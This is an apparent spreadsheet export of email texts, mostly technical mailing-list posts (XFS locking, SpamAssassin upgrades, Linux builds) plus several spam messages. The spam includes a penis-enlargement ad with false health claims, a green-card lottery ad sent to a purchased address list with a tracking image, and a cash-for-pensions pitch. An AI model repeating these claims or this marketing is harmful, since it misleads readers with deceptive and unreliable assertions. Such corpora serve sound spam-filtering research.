 XFS_ILOCK_SHARE flags before we get acl, which may cause deadlock.
 Because when getting acl, it will allocate memory in KM_SLEEP, If the 
 memory is tight, the process will call xfs_strategy, and may 
 lock(XFS_ILOCK_SHARE)the same inode again. If between these two locks, 
 another process try to lock the inode by XFS_ILOCK_EXCL, these two 
 processes  will be deadlock. As follows,
     A process get ea                         B process want lock ipA
 1) xfs_ilock(ipA, XFS_ILOCK_SHARE)             .....................
             |                                         |
             |                                         |
          get acl                        2) xfs_ilock(ipA, XFS_ILOCK_EXCL)
             |                                         |
             |                                         |
         memory tight
             |
             |
         xfs_stragegy
             |
             |
 3)xfs_ilock(ipA, XFS_ILOCK_SHARE)        ............................
   these two processes will be dead lock.
 So I believe that acl allocation GFP_MASKshould be changed to KM_NOFS.
 right?
 best regards
                                                  wdd
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: the walls are alive with the sound of insects
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=60761
 Date: Not supplied
 http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=60761
</t>
  </si>
  <si>
    <t xml:space="preserve">It's possible...I performed the update via "rpm -U"...which, of course, 
 created all the new rulesets as "xx_rulename.cf.rpmnew"  Crud.  I'll have 
 to start moving things around.
 On Thu, 5 Sep 2002, Malte S. Stretz wrote:
 &gt; On Thursday 05 September 2002 04:10 CET Mike Burger wrote:
 &gt; &gt; Just loaded up SA 2.40 from Theo's RPMs...spamassassin-2.40-1 and
 &gt; &gt; perl-Mail-SpamAssassin-2.40-1 on a RH 7.1 system with perl 5.6.1 running
 &gt; &gt; on it.
 &gt; &gt;
 &gt; &gt; I'm getting messages that seem to indicate that SA can't find
 &gt; &gt; PerMsgStatus, like so:
 &gt; &gt;
 &gt; &gt; Sep  4 21:01:59 burgers spamd[17579]: Failed to run CTYPE_JUST_HTML
 &gt; &gt; SpamAssassin test, skipping: ^I(Can't locate object method
 &gt; &gt; "check_for_content_type_just_html" via package
 &gt; &gt; "Mail::SpamAssassin::PerMsgStatus" (perhaps you forgot to load
 &gt; &gt; "Mail::SpamAssassin::PerMsgStatus"?) at
 &gt; &gt; /usr/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/PerMsgStatus.pm line
 &gt; &gt; 1814, &lt;STDIN&gt; line 21. )
 &gt; &gt;
 &gt; &gt;[...]
 &gt; &gt;
 &gt; &gt; Any ideas?
 &gt; 
 &gt; Perl doesn't complain that it can't find PerMsgStatus.pm but the function 
 &gt; check_for_content_type_just_html(). Do you probably have some old rules 
 &gt; files still lurking around? This test existed in 2.31 but is gone/was 
 &gt; renamed with 2.40.
 &gt; 
 &gt; Malte
 &gt; 
 &gt;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</si>
  <si>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&lt;strong&gt;More AmphetaDesk Reviews&lt;/strong&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: e59c6ca5938fc27a6995e30fc10b6482
 Date: Not supplied
 It came out a while ago, but Ben Hammersley reviewed AmphetaDesk and a few 
 other free aggregators in his Guardian article, Working the web: Newsreaders[1]
 . In more timely news, OSDir[2], a repository of "stable, open source apps", 
 has reviewed AmphetaDesk[3] and labels it an 'OSDir.com preferred' app. They 
 also give you the ability to rate AmphetaDesk[4] on a scale of 1-10. You can 
 see the current rating here[5].
 [1] http://www.guardian.co.uk/online/story/0,3605,781838,00.html
 [2] http://www.osdir.com/
 [3] http://osdir.com/modules.php?op=modload&amp;name=News&amp;file=article&amp;sid=34&amp;mode=thread&amp;order=0&amp;thold=0
 [4] http://osdir.com/modules.php?op=modload&amp;name=Downloads&amp;file=index&amp;req=ratedownload&amp;lid=28&amp;ttitle=%3Ch3%3EShow%20Your%20Support%20for%20Amphetadesk%3C/h3%3E
     %3Ch3%3EShow%20Your%20Support%20for%20Amphetadesk%3C/h3%3E"
 [5] http://osdir.com/modules.php?op=modload&amp;name=Downloads&amp;file=index&amp;req=viewdownloaddetails&amp;lid=28&amp;ttitle=AmphetaDesk
     AmphetaDesk"
</t>
  </si>
  <si>
    <t xml:space="preserve">Adam L. Beberg wrote:
 &gt; Fair use needs to be clarified a bit
 That's an understatement!!!
 &gt; How else do i ever have hope of finding a job working for someone
 &gt; that makes things people are supposed to ... *drumroll* pay for.
 Well, you could damn well get a fucking better attitude.
 I practically handed you a job the other week and you
 pissed all over me. I'm done helping you. You have joined
 a very exclusive club that up to now has only had my sister
 as a member.
 - Joe
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: You can't beat city hall
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8260640,1717/
 Date: 2002-09-26T02:16:22+01:00
 (Arizona Republic)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] CVS question?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Jul 18, 2002 at 11:13:24PM +0100, John Gay wrote:
 &gt; kdebase took just under 46 hours. I've got lots of grief from the wife for 
 &gt; the computer running 'round the clock this week. The rest of KDE should build 
 Tell her that the computer is less likely to fail if it's never turned off
 so you won't need to be spending money on repairs, and that this offsets the
 electricity costs.
 This has the advantage of actually being true (well, up to the , anyway) :-)
 Niall
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Selling Wedded Bliss (was Re: Ouch...)
</t>
  </si>
  <si>
    <t xml:space="preserve">CDale:
 &gt;I guess [Geege] doesn't want everyone to know about all the kinky sex she 
 &gt;and I have had.
 Yeah, like I'm going to believe that without
 seeing the photos. Next, you'll be telling me
 that Beberg found a job he likes.
 _________________________________________________________________
 Join the worlds largest e-mail service with MSN Hotmail. 
 http://www.hotmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bank robber gets the loot, makes it out of bank, shoots self in
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8412057,1717/
 Date: 2002-09-30T23:25:23+01:00
 (TBO)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: A moment of silence for the First Amendment (fwd)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-09-30 at 09:20, Owen Byrne wrote:
 &gt; In my experience, this is classic "American" behaviour, and I don't 
 &gt; think its on the increase outside of the US of A.
 In my experience, this protest behavior is really only an issue in
 "ultra-liberal" coastal cities, which is where I normally live.  It is
 part of the culture and that behavior is viewed as acceptable.  
 For comparison, contrast this with the character of the arguably more
 serious protests against Federal government abuse in the inter-mountain
 West.  They have a very different idea of what constitutes acceptable
 protest practice.  Those protests remain largely civil and polite, if
 heated and aggressive, and those involve a far greater percentage of the
 local population.  And unlike 99% of the liberal coastal city protests
 I've seen, the people protesting in the inter-mountain West are actually
 facing immediate dire consequences from the activities they are
 protesting and are strongly motivated to protest in a manner that gets
 results.  Some of their tactics, such as the practice of many businesses
 and restaurants in northern Nevada to not give service to anyone known
 to be in the employ of the BLM and related agencies, have been very
 effective at forcing dialog.  I don't recall anyone characterizing their
 protests as impolite, rude, or violent, but then they have more to lose.
 -James Rogers
  jamesr@best.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: My brain hurts
</t>
  </si>
  <si>
    <t xml:space="preserve">More than a dozen jokes - thanks guys and girls!
 (plus some anti-French abuse from the usual suspect).
 Well my brain doesn't hurt so much any more, and it was well worth it.
 I've now got an even faster method for elliptic-curve point counting,
 both pratically and asymptotically.
 It lifts a curve over a field of degree n in time O(n^(2+1/2+eps)),
 or O(n^(2+eps)) with precomputation.  Before the best methods took
 O(n^(3+eps)) without precomputation, or O(n^(2+1/2+eps)) with it.
 The precomputation is done once per field, not per curve, and takes
 time O(n^(3+eps)).  Here eps is an arbitrarily small number, hiding
 some logarithmic factors.
 After lifting, you compute a norm in time O(n^(2+1/3+eps)) to get the
 number of points on the curve.
 Here's an example over a 1009-bit field, without precomputation, using
 a 1 GHz Pentium III:
 ------------------------------------------------------------------------------
 &gt; ./ecpc4 -d 1009 -j 0x123
 INFO: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 INFO: -=-=-=-=-= ECPC: Elliptic Curve Point Counting, made easy! =-=-=-=-=-
 INFO: -=-=-=-=-= v4.0.0. (c) ArgoTech 2001. All rights reserved. =-=-=-=-=-
 INFO: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 [...]
 INFO: Picked field polynomial 1+x^55+x^1009.
 INFO: Starting ECPC on j = 0x123...
 INFO: Done after 138.33 seconds.
 INFO: Checking... OK OK OK OK OK OK OK OK OK OK
 [...]
 CURVE: 5486124068793688683255936251187209270074392635932332070112001988456197381759672947165175699536362793613284725337872111744958183862744647903224103718245568925556758419805069056847065147709058947190200192542277555125346128173135573355537502225974504428432790108988791795746287271944131683364548299056172016
 [...]
 INFO: 1 curve processed.
 INFO: Bye!
 ------------------------------------------------------------------------------
 L8r,
   Rob.
      .-.                    Robert.Harley@argote.ch                    .-.
     /   \           .-.      Software Development       .-.           /   \
    /     \         /   \       .-.     _     .-.       /   \         /     \
   /       \       /     \     /   \   / \   /   \     /     \       /       \
  /         \     /       \   /     `-'   `-'     \   /       \     /         \
             \   /         `-'       ArgoTech      `-'         \   /
              `-'                http://argote.ch/              `-'
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Do you have a handlebar moustache? Then the Handlebar Club is the
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8256508,1717/
 Date: 2002-09-25T23:11:06+01:00
 (Some Gentleman)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Delayed Mail (still being retried)
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a MIME-encapsulated message.
 --0A47D3EA4.1027483206/kci.kciLink.com
 Content-Description: Notification
 Content-Type: text/plain
 This is the Postfix program at host kci.kciLink.com.
 ####################################################################
 # THIS IS A WARNING ONLY.  YOU DO NOT NEED TO RESEND YOUR MESSAGE. #
 ####################################################################
 Your message could not be delivered for 4.0 hours.
 It will be retried until it is 5.0 days old.
 For further assistance, please send mail to &lt;postmaster&gt;
 			The Postfix program
 &lt;khera@kcilink.com&gt;: connect to yertle.kcilink.com[216.194.193.105]: Operation
     timed out
 --0A47D3EA4.1027483206/kci.kciLink.com
 Content-Description: Delivery error report
 Content-Type: message/delivery-status
 Reporting-MTA: dns; kci.kciLink.com
 Arrival-Date: Tue, 23 Jul 2002 19:43:18 -0400 (EDT)
 Final-Recipient: rfc822; khera@kcilink.com
 Action: delayed
 Diagnostic-Code: X-Postfix; connect to yertle.kcilink.com[216.194.193.105]:
     Operation timed out
 Will-Retry-Until: Sun, 28 Jul 2002 19:43:18 -0400 (EDT)
 --0A47D3EA4.1027483206/kci.kciLink.com
 Content-Description: Undelivered Message Headers
 Content-Type: text/rfc822-headers
 Received: from localhost (localhost [127.0.0.1])
 	by kci.kciLink.com (Postfix) with ESMTP id 0A47D3EA4
 	for &lt;khera@kcilink.com&gt;; Tue, 23 Jul 2002 19:43:18 -0400 (EDT)
 Received: from kci.kciLink.com ([206.112.95.6]) by localhost (lorax.kciLink.com [127.0.0.1]) (amavisd-new) with SMTP id 50275-07 for &lt;khera@kcilink.com&gt;; Tue, 1e Jul 2002 19:43:17 -0000 (EDT)
 Received: from usw-sf-list2.sourceforge.net (usw-sf-fw2.sourceforge.net [216.136.171.252])
 	by kci.kciLink.com (Postfix) with ESMTP id 056483E44
 	for &lt;khera@kcilink.com&gt;; Tue, 23 Jul 2002 19:43:16 -0400 (EDT)
 Received: from usw-sf-list1-b.sourceforge.net ([10.3.1.13] helo=usw-sf-list1.sourceforge.net)
 	by usw-sf-list2.sourceforge.net with esmtp (Exim 3.31-VA-mm2 #1 (Debian))
 	id 17X9G9-0002hQ-00; Tue, 23 Jul 2002 16:40:05 -0700
 Received: from mail.t-intra.de ([62.156.147.75] helo=mailc0911.dte2k.de)
 	by usw-sf-list1.sourceforge.net with esmtp (Exim 3.31-VA-mm2 #1 (Debian))
 	id 17X9Fx-0003Nt-00
 	for &lt;spamassassin-talk@lists.sourceforge.net&gt;; Tue, 23 Jul 2002 16:39:54 -0700
 Received: from mailc0908.dte2k.de ([10.50.185.8]) by mailc0911.dte2k.de with Microsoft SMTPSVC(5.0.2195.4453);
 	 Wed, 24 Jul 2002 01:38:54 +0200
 Received: from nebukadnezar.msquadrat.de ([62.226.214.36]) by mailc0908.dte2k.de with Microsoft SMTPSVC(5.0.2195.4453);
 	 Wed, 24 Jul 2002 01:38:54 +0200
 Received: from otherland (otherland.msquadrat.de [10.10.10.10])
 	by nebukadnezar.msquadrat.de (Postfix on SuSE Linux 7.3 (i386)) with ESMTP
 	id 357113FC; Wed, 24 Jul 2002 01:39:46 +0200 (CEST)
 Content-Type: text/plain;
   charset="iso-8859-1"
 From: "Malte S. Stretz" &lt;msquadrat.nospamplease@gmx.net&gt;
 To: SpamAssassin Talk ML &lt;spamassassin-talk@example.sourceforge.net&gt;
 User-Agent: KMail/1.4.2
 References: &lt;3D3DDEE7.2A07C357@cnc.bc.ca&gt; &lt;20020723231313.GB14564@kluge.net&gt;
 In-Reply-To: &lt;20020723231313.GB14564@kluge.net&gt;
 Cc: Kevin Gagel &lt;gagel@cnc.bc.ca&gt;
 X-Accept-Language: de, en
 MIME-Version: 1.0
 Content-Transfer-Encoding: 8bit
 Message-Id: &lt;200207240142.23673@malte.stretz.eu.org&gt;
 X-OriginalArrivalTime: 23 Jul 2002 23:38:54.0735 (UTC) FILETIME=[1B8161F0:01C232A2]
 Subject: [SAtalk] Why not upgrade to 2.40 today? (was: Re: [Fwd: Re: [Razor-users] can't find Razor/Client.pm])
 Sender: spamassassin-talk-admin@example.sourceforge.net
 Errors-To: spamassassin-talk-admin@example.sourceforge.net
 X-BeenThere: spamassassin-talk@example.sourceforge.net
 X-Mailman-Version: 2.0.9-sf.net
 Precedence: bulk
 List-Help: &lt;mailto:spamassassin-talk-request@example.sourceforge.net?subject=help&gt;
 List-Post: &lt;mailto:spamassassin-talk@example.sourceforge.net&gt;
 List-Subscribe: &lt;https://example.sourceforge.net/lists/listinfo/spamassassin-talk&gt;,
 	&lt;mailto:spamassassin-talk-request@lists.sourceforge.net?subject=subscribe&gt;
 List-Id: Talk about SpamAssassin &lt;spamassassin-talk.example.sourceforge.net&gt;
 List-Unsubscribe: &lt;https://example.sourceforge.net/lists/listinfo/spamassassin-talk&gt;,
 	&lt;mailto:spamassassin-talk-request@lists.sourceforge.net?subject=unsubscribe&gt;
 List-Archive: &lt;http://www.geocrawler.com/redir-sf.php3?list=spamassassin-talk&gt;
 X-Original-Date: Wed, 24 Jul 2002 01:42:23 +0200
 Date: Wed, 24 Jul 2002 01:42:23 +0200
 X-Virus-Scanned: by amavisd-new amavisd-new-20020630 (@kci)
 X-Razor-id: 1aefed7c18b89a0962d66a6bd77b4df015ff0dc8
 --0A47D3EA4.1027483206/kci.kciLink.com--
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou (matthias@egwn.net) wrote*:
 &gt;You're really better off backuping all placed where you know you've hand
 &gt;edited or installed some files. For me that's only /etc/, /root/ and
 &gt;/home/. Then you reinstall cleanly, formating "/", put your /home/ files
 &gt;back into place and you're ready to go.
 Matthias I gotta believe you, I've been using your RPMs for some time now :) That's
 the way I'll do it. A clean start but with the old configs at the ready for diff-
 ing when needed. I'll find some old HD for those media files.
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: &lt;adv:ce&gt;Win a Green Card and Become a U.S Citizen!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;body bgcolor="#FFFFFF" marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"&gt;
 &lt;CENTER&gt;
 &lt;TABLE width="600" cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;TABLE cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/index.asp?L=0&amp;CID=78"&gt;&lt;img src="http://www.divl.com/images/top_flag.gif" width="175" height="80" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;img src="http://www.divl.com/images/mail/top_blue.gif" width="425" height="80" border="0"&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;TABLE cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/application.asp?L=0&amp;CID=78"&gt;&lt;img src="http://www.divl.com/images/btn_apply0.gif" width="124" height="30" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/general.asp?L=0&amp;CID=78"&gt;&lt;img src="http://www.divl.com/images/btn_requirements0.gif" width="132" height="30" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/faq.asp?L=0&amp;CID=78"&gt;&lt;img src="http://www.divl.com/images/btn_faq0.gif" width="53" height="30" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;img src="http://www.divl.com/images/mail/top_red.gif" width="291" height="30" border="0"&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colspan="4"&gt;&lt;img src="http://www.divl.com/images/trans.gif" width="1" height="2" border="0"&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;TABLE width="600" cellspacing="0" cellpadding="1" border="0"&gt;
 &lt;TR&gt;
 &lt;TD bgcolor="#999999"&gt;
 &lt;TABLE bgcolor="#FFFFFF" width="100%" height="100%" cellspacing="0" border="0"&gt;
 &lt;TR&gt;
 &lt;TD valign="top"&gt;
 &lt;TABLE cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;img src="http://www.divl.com/images/mail/lang_spacer.gif" width="11" height="21"&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/index.asp?L=0&amp;CID=78"&gt;&lt;img src="http://www.divl.com/images/mail/lang_en.gif" width="80" height="21" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/index.asp?L=4&amp;CID=78"&gt;&lt;img src="http://www.divl.com/images/mail/lang_es.gif" width="85" height="21" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/index.asp?L=1&amp;CID=78"&gt;&lt;img src="http://www.divl.com/images/mail/lang_de.gif" width="80" height="21" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/index.asp?L=2&amp;CID=78"&gt;&lt;img src="http://www.divl.com/images/mail/lang_it.gif" width="80" height="21" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/index.asp?L=3&amp;CID=78"&gt;&lt;img src="http://www.divl.com/images/mail/lang_fr.gif" width="85" height="21" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/index.asp?L=5&amp;CID=78"&gt;&lt;img src="http://www.divl.com/images/mail/lang_se.gif" width="85" height="21" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;A HREF="http://www.divl.com/index.asp?L=6&amp;CID=78"&gt;&lt;img src="http://www.divl.com/images/mail/lang_dk.gif" width="80" height="21" border="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;img src="http://www.divl.com/images/mail/lang_spacer.gif" width="10" height="21"&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;TABLE cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;TR&gt;
 &lt;td rowspan="4"&gt;&lt;img src="http://www.divl.com/images/trans.gif" width="35" height="1"&gt;&lt;/TD&gt;
 &lt;TD colspan="3"&gt;&lt;img src="http://www.divl.com/images/trans.gif" width="1" height="20"&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD width="370" valign="top"&gt;
 &lt;FONT FACE="verdana, arial, helvetica" size="1" color="#000000"&gt;
 &lt;img src="http://www.divl.com/images/mail/txt_win0.gif" width="371" height="43" border="0"&gt;
 &lt;BR&gt;
 &lt;A HREF="http://www.divl.com/application.asp?L=0&amp;CID=78"&gt;&lt;img src="http://www.divl.com/images/btn_apply_today0.gif" width="103" height="17" border="0"&gt;&lt;/A&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;img src="http://www.divl.com/images/txt_theofficial0.gif" width="196" height="18" border="0"&gt;&lt;BR&gt;
 The United States has a program, called Diversity Immigrant Visa
 Lottery (better known as the Green Card Lottery), making available
 each year by random selection 50,000 permanent residence visas
 (Green Cards) to people from around the world. The objective of the
 program is to issue Green Cards to individuals born in countries with
 historically low levels of immigration to the United States.
 &lt;BR&gt;&lt;BR&gt;
 &lt;img src="http://www.divl.com/images/txt_whatis0.gif" width="144" height="18" border="0"&gt;&lt;BR&gt;
 A Green Card is a Permanent Residence Visa of the U.S.A. A Green Card
 will give you legal right to work and live permanently in the United
 States. Green Card holders receive health, education, and several other
 benefits. If you win a Green Card, you can apply for U.S. Citizenship at
 a later time. The Green Card does not affect your present citizenship.
 You and your family could be lucky winners!
 &lt;BR&gt;&lt;BR&gt;
 &lt;A HREF="http://www.divl.com/application.asp?L=0&amp;CID=78"&gt;&lt;img src="http://www.divl.com/images/btn_apply_today0.gif" width="103" height="17" border="0"&gt;&lt;/A&gt;
 &lt;/FONT&gt;
 &lt;/TD&gt;
 &lt;TD width="35"&gt;
 &lt;img src="http://www.divl.com/images/trans.gif" width="35" height="1" border="0"&gt;
 &lt;/TD&gt;
 &lt;TD width="122" valign="top"&gt;
 &lt;img src="http://www.divl.com/images/mail/happypeople.gif" width="120" height="120" border="0"&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colspan="3"&gt;
 &lt;img src="http://www.divl.com/transView.asp?CID=78" width="1" height="20" border="0"&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD align="center"&gt;
 &lt;TABLE width="522" cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;FONT FACE="verdana, arial, helvetica" size="1" color="#000000"&gt;
 &lt;BR&gt;&lt;BR&gt;
 Your email address was obtained from a purchased list, Reference # 00193.  If you wish to unsubscribe
 from this list, please &lt;a href="http://www.divl.com/unsubscribe.asp?CID=78"&gt;Click Here&lt;/a&gt;.
 If you have previously unsubscribed and are still receiving this message, you may email our
 &lt;a href="mailto:nospamws@yahoo.com?Subject=Abuse Report"&gt;Abuse Control Center&lt;/a&gt;, or call 1-888-763-2497,
 or write us at: NoSpam, 6484 Coral Way, Miami, FL, 33155.&lt;BR&gt;&lt;BR&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;/FONT&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/CENTER&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;
 &lt;table bgcolor=3D"663399" border=3D"2" width=3D"999" cellspacing=3D"0" cel=
 lpadding=3D"0"&gt;
   &lt;tr&gt;
     &lt;td colspan=3D"3" width=3D"999"&gt; &lt;hr&gt;&lt;font color=3D#66FF66"&gt; 
 &lt;font size=3D"5"&gt;&lt;center&gt;
 We &lt;b&gt;won't&lt;/b&gt; lie to you, smaller &lt;b&gt;IS&lt;/b&gt; better.......&lt;br&gt;
 .&lt;br&gt;
 .&lt;br&gt;
 .&lt;br&gt;
 .&lt;br&gt;
 .&lt;br&gt;
 .&lt;br&gt;
 .&lt;br&gt;
 .&lt;br&gt;
 When you're talking about &lt;b&gt;SUPERCOMPUTERS!&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt; 
 We HATE to break it to you guys, &lt;br&gt;but women don't think that way...
 &lt;center&gt;&lt;b&gt;&lt;br&gt;&lt;br&gt;
 In the REAL WORLD, &lt;br&gt;
 Size &lt;font size=3D"7"&gt;&lt;i&gt;DOES &lt;/i&gt;&lt;font size=3D"6"&gt;matter. &lt;font size=3D"7=
 "&gt;BIG
 &lt;font size=3D"6"&gt; time!&lt;br&gt;&lt;br&gt;
 &lt;table bgcolor=3D"#CCFF33" border=3D"2" width=3D"600"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;center&gt;
 &lt;center&gt;&lt;font size=3D"6"&gt;
 &lt;a href=3D"http://www.freehostchina.com/site2/web2pleasure/index.html"&gt; &lt;b=
 r&gt;&lt;b&gt;Breakthroughs&lt;/a&gt; in Science&lt;/b&gt;&lt;br&gt;
  have finally &lt;i&gt;enabled&lt;/i&gt; men like you,&lt;br&gt; to take things into their o=
 wn hands!
  &lt;br&gt; &lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;br&gt; 
  &lt;font size=3D"5"&gt;
 Most of our techniques are 21st Century, but some of these techniques &lt;br&gt;=
 have been around for CENTURIES! &lt;br&gt; &lt;br&gt; 
 &lt;i&gt;Ancient secrets&lt;/i&gt;, that only specific tribes, taught their wisest eld=
 ers.&lt;br&gt; &lt;br&gt; 
 We reveal ALL of these to you, and&lt;a href=3D"http://www.freehostchina.com/=
 site2/web2pleasure/index.html"&gt; more!&lt;/a&gt;&lt;br&gt; &lt;br&gt; &lt;br&gt; 
 &lt;font color=3D"#66CCFF"&gt;
 What can our techniques help you accomplish &lt;i&gt;naturally&lt;/i&gt;?&lt;br&gt; &lt;br&gt; 
 &lt;font size=3D"6"&gt;
 &lt;font color=3D"#FFFF00" &gt; 
 Effectively ADD between 1" to 4.5" to your penis size! &lt;br&gt;
 &lt;font size=3D"4"&gt;
 &lt;i&gt;Without&lt;/i&gt; surgery, pumps, or other painful methods. &lt;br&gt;&lt;br&gt;
 &lt;table bgcolor=3D"#CCFF33" border=3D"2" width=3D"600"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;center&gt;
 &lt;font color=3D"#6633FF"&gt;&lt;font size=3D"5"&gt;&lt;br&gt; 
 "I'm convinced, let me get access to these,&lt;br&gt;
 &lt;a href=3D"http://www.freehostchina.com/site2/web2pleasure/index.html"&gt; AM=
 AZING TECHNIQUES ONLINE!&lt;/a&gt;"  
  &lt;br&gt; &lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;br&gt; 
 &lt;font color=3D#66FF66"&gt;
 &lt;font size=3D"5"&gt;&lt;br&gt; 
 Every man on the &lt;i&gt;planet&lt;/i&gt; would like to increase &lt;br&gt;
 his penis SIZE and WIDTH, and we can show you how to do BOTH!  &lt;br&gt;&lt;br&gt;
 &lt;br&gt; 
 &lt;table bgcolor=3D"#CCFF33" border=3D"2" width=3D"600"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;center&gt;&lt;font size=3D"5"&gt;&lt;br&gt;
 Don't be Fooled by methods that only increase your LENGTH!&lt;br&gt;&lt;br&gt;
 &lt;a href=3D"http://www.freehostchina.com/site2/web2pleasure/index.html"&gt;Inc=
 rease the LENGTH &lt;b&gt;and&lt;/b&gt; WIDTH of your penis!&lt;/a&gt;
   &lt;br&gt; &lt;br&gt; SAFELY and NATURALLY&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;br&gt; 
 &lt;br&gt; &lt;br&gt; &lt;br&gt; &lt;br&gt; &lt;br&gt;  &lt;hr&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Contact lenses 'boost sexual success'
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8415795,1440/
 Date: Not supplied
 Night-clubbers who swapped their glasses for contact lenses report big 
 increases in physical contact with the opposite sex
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: WE PAY CASH, NOW!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 We are Trans World Funding, providing immediate CASH for your business and personal needs.
 Visit us at http://www.tfund2000.,com
 We pay cash for military, government or VA pensions.
 We provide a health plan, including  dental, vision care, prescription drugs and chiropractic service.
 Lack of working capital?  We can bring in cash...now.
